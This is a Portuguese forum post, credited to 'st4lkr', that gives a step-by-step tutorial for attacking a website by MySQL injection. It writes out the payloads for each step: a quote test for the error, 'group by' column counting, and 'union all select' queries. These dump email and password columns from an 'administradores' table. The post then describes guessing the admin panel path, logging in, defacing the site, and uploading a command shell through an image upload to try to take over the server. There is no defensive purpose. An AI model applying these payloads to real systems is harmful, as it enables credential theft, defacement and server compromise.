MySQL Injection
Arquivo vulnerável:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Primeiro retiramos o “14” e colocamos o -1’ ;
Assim saberemos se o site está vulnerável
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apareceu o sequinte erro:
SQL ERROR: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
O site está vulnerável !
Vamos saber agora quantas colunas o site tem, colocamos o group by 1 para saber se tem a coluna 1
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... group by 1
Esse site tem 3 colunas então o link:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... group by 3
e o link:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... group by 4
Então descobrimos que o site tem 3 colunas agora vamos fazer o código union:
union all select 1,2,3
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,2,3
Podemos visualizar a coluna 2 e 3.
Agora vamos achar o nome da tabela do site tentando várias possibilidades.
Vamos lá !
Código: union all select 1,2,3 from ”nome da tabela”--
O nome da tabela desse site é “administradores” mas poderia ser “user, username, usuários, admin, nome, nomes” etc...
Se aparecer a mesma imagem de antes sem erro é que essa é a tabela correta.
Se aparecer o erro significa que a tabela está incorreta.
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... UNION all SELECT 1,2,3 from administradores—
para achar o usuário você coloca:
union all select 1,email,2,3 from administradores--
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,email,3 from administradores-
Agora vamos descobrir a senha, usaremos a coluna número 3, assim nossa página terá o e-mail na coluna 2 e a senha na coluna 3 mostradas na tela, caso haja erro no nome da coluna da senha, não aparecerá nada, assim sabemos que erramos o nome da coluna.
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,email,senha from administradores-
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Tentaremos achar a pagina do administrador na força bruta, testando mesmo, existem centenas de possibilidades mas as mais comuns são Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ; Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ; Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
Nesse caso o painel do administrador fica em
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Agora é só entramos no painel do administrador.
Estamos como administrador da página agora, podemos fazer um deface postando uma noticia, enviando uma cmd no local de enviar fotos da noticia ou em qualquer e outra sessão que aceite upload, para tentar ganhar acesso a todo servidor, porém nem sempre será possível fazer upload.
@editado
Fonte: st4lkr
Comment